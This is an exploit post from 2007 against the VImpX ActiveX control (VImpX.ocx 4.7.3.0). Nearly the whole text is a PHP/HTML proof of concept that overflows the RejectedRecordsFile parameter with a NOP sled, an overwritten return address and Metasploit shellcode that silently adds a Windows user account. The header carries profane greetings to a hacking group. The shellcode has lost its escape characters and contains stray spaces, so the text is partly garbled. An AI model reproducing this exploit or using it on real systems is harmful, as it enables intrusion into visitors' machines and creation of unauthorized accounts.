vimpx-overflow.txt
Posted on 16 October 2007
> <!- > ************************************** > | VImpX ActiveX (VImpX.ocx v. 4.7.3.0) Remote > Buffer Overflows Exploit (RejectedRecordsFile) > | Code by 'Saw13' > | Software Site: > http://www.dbsoftlab.com/e107_plugins/content/content.php?content.53 > | Special Fuck to : Delta Hacking Security > Team--Farzad Sharifi- All Lashiayne Fucking MemberZ Special TANX : CrazyAngel - snake > *************************************** > -> > <html> > <object > classid='clsid:7600707B-9F47-416D-8AB5-6FD96EA37968' > id='VImpAX1'> > <?php > /* win32_adduser - PASS=tzu EXITFUNC=seh USER=sun > Size=483 Encoder=PexAlphaNum http://metasploit.com */ > $shellcode = > "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49". > "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36". > "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34". > "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41". > "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54". > "x42x30x42x30x42x30x4bx58x45x44x4ex43x4bx38x4ex57". > "x45x50x4ax37x41x50x4fx4ex4bx48x4fx44x4ax51x4bx48". > "x4fx45x42x42x41x50x4bx4ex49x34x4bx48x46x43x4bx38". > "x41x30x50x4ex41x43x42x4cx49x49x4ex4ax46x58x42x4c". > "x46x57x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e". > "x46x4fx4bx33x46x35x46x42x46x50x45x47x45x4ex4bx58". > "x4fx35x46x32x41x30x4bx4ex48x56x4bx48x4ex50x4bx54". > "x4bx38x4fx35x4ex41x41x50x4bx4ex4bx38x4ex51x4bx38". > "x41x30x4bx4ex49x38x4ex45x46x42x46x50x43x4cx 41x43". > "x42x4cx46x46x4bx58x42x44x42x33x45x48x42x4cx4ax57". > "x4ex50x4bx38x42x54x4ex30x4bx38x42x37x4ex41x4dx4a". > "x4bx58x4ax36x4ax30x4bx4ex49x50x4bx58x42x38x42x4b". > "x42x50x42x50x42x30x4bx38x4ax56x4ex43x4fx55x41x53". > "x48x4fx42x36x48x55x49x48x4ax4fx43x58x42x4cx4bx47". > "x42x45x4ax36x42x4fx4cx58x46x30x4fx45x4ax46x4ax49". > "x50x4fx4cx38x50x30x47x45x4fx4fx47x4ex43x36x4dx56". > "x46x36x50x32x45x46x4ax47x45x56x42x52x4fx52x43x36". > "x42x52x50x46x45x56x46x47x42x52x45x47x43x37x45x56". > "x44x57x42x42x43x57x45x47x50x56x42x52x46x47x4cx37". > "x45x47x42x52x4fx42x41x34x46x34x46x54x42x42x48x42". > "x48x32x42x52x50x46x45x36x46x57x42x52x4ex46x4fx36". > "x43x56x41x46x4ex36x47x56x44x47x4fx36x45x57x42x37". > "x42x52x41x54x46x46x4dx56x49x46x50x56x49 x36x43x37". > "x46x47x44x37x41x56x46x47x4fx56x44x37x43x37x42x52". > "x43x57x45x57x50x46x42x42x4fx32x41x34x46x54x46x54". > "x42x50x5a"; > $junk = "x45x45x45x59"; > $eip = "x2dxd1xe0x77"; // call eax user32.dll > $exploit= > str_repeat("x90",268).$eip.$junk."x90x90x90x0dx01".str_repeat("x90",16).$shellcode.str_repeat("x90",9999); > echo "<param name="RejectedRecordsFile" > value="$exploit"/>"; > ?> > </object> > </html>